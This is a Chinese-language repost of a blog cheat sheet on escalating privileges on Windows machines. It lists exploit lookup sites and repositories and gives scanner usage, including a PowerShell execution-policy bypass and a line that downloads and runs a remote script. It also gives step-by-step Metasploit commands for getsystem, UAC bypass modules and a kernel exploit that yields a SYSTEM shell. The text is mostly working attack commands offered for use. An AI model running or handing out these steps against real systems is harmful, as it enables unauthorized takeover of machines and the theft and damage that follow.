打开APP
userphoto
未登录

开通VIP,畅享免费电子书等14项超值服

开通VIP
干货|windows提权速查流程 收藏备用

1.可利用漏洞信息收集

收集本机systeminfo中补丁信息

在提权辅助平台 https://i.hacking8.com/tiquan/ 中查询可利用exp

然后查询exp,选择对应的Exp下载运行即可。
https://i.hacking8.com/
https://github.com/SecWiki/windows-kernel-exploits

提权Exp的运行方式,一般有以下几种:

直接执行exe程序,成功后会打开一个cmd窗口,在新窗口中权限就是systemWebShell中执行exe程序,执行方式为xxx.exe whoami,成功后直接执行命令,再修改命令内容,可以执行不同的命令利用MSF等工具C 源码,Python脚本,PowerShell脚本等特殊方式

2.WinSystemHelper

使用WinSystemHelper检查可利用的漏洞。该工具适合在任何Windows服务器上进行已知提权漏洞的检测

https://github.com/brianwrf/WinSystemHelper

上传WinSysHelper.bat、explt2003.txt、expgt2003.txt,运行bat查看结果

然后在可利用的Exp中任意下载一个并执行即可

3.Sherlock

Sherlock是在Windows下用于本地提权的PowerShell脚本
分析漏洞出漏洞后利用对应Exp即可

# 启动Powershell$ powershell.exe -exec bypass
# 本地加载脚本$ Import-Module Sherlock.ps1
# 远程加载脚本$ IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1')
# 检查漏洞,Vulnstatus为Appears Vulnerable即存在漏洞$ Find-AllVulns

4.msf中的提权方法

getsystem

meterpreter> getsystem

BypassUAC

use exploit/windows/local/bypassuacuse exploit/windows/local/bypassuac_injectionuse windows/local/bypassuac_vbsuse windows/local/ask
meterpreter> background # 后台session msf> use exploit/windows/local/bypassuacmsf> set SESSION <session_id> # 后台session时会返回session_id,如不清楚可以使用命令sessions -lmsf> run

内核提权

# 查询补丁meterpreter> run post/windows/gather/enum_patches [ ] KB2999226 installed on 11/25/2020[ ] KB976902 installed on 11/21/2010
# 查询Expmsf> use post/multi/recon/local_exploit_suggester msf> set LHOST <攻击机IP>msf> set SESSION <session_id>msf> run
# 利用示例msf> use exploit/windows/local/cve_2019_1458_wizardopium msf> set SESSION <session_id>msf> runmeterpreter> getuidServer username: NT AUTHORITY\SYSTEM

作者及来源:Leticia's Blog

本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请点击举报
打开APP,阅读全文并永久保存 查看更多类似文章
猜你喜欢
类似文章
【热】打开小程序,算一算2024你的财运
利用metasploit绕过UAC的5种方式
metasploit 手动提权
msf提权简单利用
meterpreter使用
使用Metasploit(msf)通过ms17
msfconsole使用手册
更多类似文章 >>
生活服务
热点新闻
分享 收藏 导长图 关注 下载文章
绑定账号成功
后续可登录账号畅享VIP特权!
如果VIP功能使用有故障,
可点击这里联系客服!

联系客服